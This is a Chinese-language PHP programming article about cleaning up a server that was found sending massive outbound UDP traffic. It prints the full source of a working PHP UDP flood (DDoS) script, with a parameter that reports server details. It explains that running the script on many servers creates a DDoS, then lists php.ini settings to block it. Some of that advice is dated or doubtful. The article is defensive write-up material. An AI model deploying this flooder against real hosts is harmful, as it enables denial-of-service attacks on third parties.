程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> phpddos攻擊的解決辦法(服務器發外網發送大量數據包)

phpddos攻擊的解決辦法(服務器發外網發送大量數據包)

編輯:關於PHP編程

今天自己的一台機器突然向外部發送大量數據包,可每秒到1G以上,雖然我用策略把UDP禁止包是發不出去但是很占cup啊,所以想到最後還是想辦法解決了。

先看源碼

 代碼如下 復制代碼

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
        if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER

['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Parameters can not be empty!";
        exit;
    }

for($i=0;$i<$Sendlen;$i++){
        $out .= "A";
    }

$max_time = time()+$exec_time;

while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " .

round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/

$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

關鍵代碼在於

 代碼如下 復制代碼 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

方法很簡單,向目標主機發送UDP包,在加上定義無限死循環,就會形成較大的壓力。
這個壓力是對於執行這個腳本的服務器來說的,因為它首先對自身的網寬、CPU等資源造成大量占用。
如果想用這個腳本對目標站點形成壓力,需要在多個服務器上執行該腳本,DDOS嘛


既然是用fsockopen請求外部,那就不讓他請求
php.ini裡設置

 代碼如下 復制代碼 allow_url_fopen = Off

如果這樣他還是能發包

 代碼如下 復制代碼 extension=php_sockets.dll
改成
;extension=php_sockets.dll

重啟APACHE、IIS、NGINX
這樣就可以防止PHP DDOS發包了

另外有網友說

讓腳本不允許設置為不超時很簡單,1,把set_time_limit函數禁用,2,啟用PHP的安全模式(safe_mode=on)

禁用socket函數可以把把socket模塊直接全部禁用也可以禁用fsockopen函數,

建議,由於socket常用於發送郵件找回密碼,因此建議開啟直接開啟安全模式,但是

這樣的話,腳本每30秒超時一次,估計沒有哪個“黑客”寂寞到每30秒去點一下開始DDOS。。。

經驗:這種問題一般是網站安全引起的,我們要注意網站的安全及服務器的安全,這樣就不容易被入侵了,如果會用macofee的朋友,對網站進行限制一下就會更好一些。


  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved